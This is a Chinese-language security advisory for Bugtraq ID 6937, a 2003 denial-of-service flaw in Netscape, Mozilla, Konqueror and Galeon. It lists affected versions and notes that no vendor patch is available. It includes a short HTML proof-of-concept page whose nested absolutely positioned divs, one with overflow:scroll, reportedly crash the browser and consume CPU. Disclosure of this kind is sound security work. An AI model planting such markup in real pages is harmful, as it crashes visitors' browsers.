发布日期：2003-02-25
更新日期：2003-03-04

受影响系统：

Mozilla Browser 1.1
Mozilla Browser 1.0.1
Netscape Communicator
Netscape Navigator 7.0
Netscape Navigator 6.0
KDE Konqueror the web browser
Galeon Galeon Browser 1.2.6

不受影响系统：

KDE Konqueror the web browser 2.2.2
Netscape Communicator 4.79
    - SGI IRIX 6.5.17
Netscape Communicator 4.79
    - SGI IRIX 6.5.16
Netscape Communicator 4.79
    - SGI IRIX 6.5.15

描述：

---

BUGTRAQ  ID: 6937

Netscape是一款流行的WEB浏览器。

Netscape在处理部分样式表代码时存在问题，远程攻击者可以利用这个漏洞使目标用户Netscape崩溃。

攻击者如果构建包含如下样式表代码的HTML页面：

<html>
<body>
<div style="position:absolute;">

<div style="position:absolute; overflow:scroll">

</div>
</div>
</body>
</html>

诱使Netscape用户浏览，可导致浏览器崩溃，并消耗大量CPU利用率。

<*来源：Jocke （jux@beer.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104619285705714&w=2
*>

建议：

---

厂商补丁：

Netscape
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://home.netscape.com/computing/download/index.html

浏览次数：2996
严重程度：0（网友投票）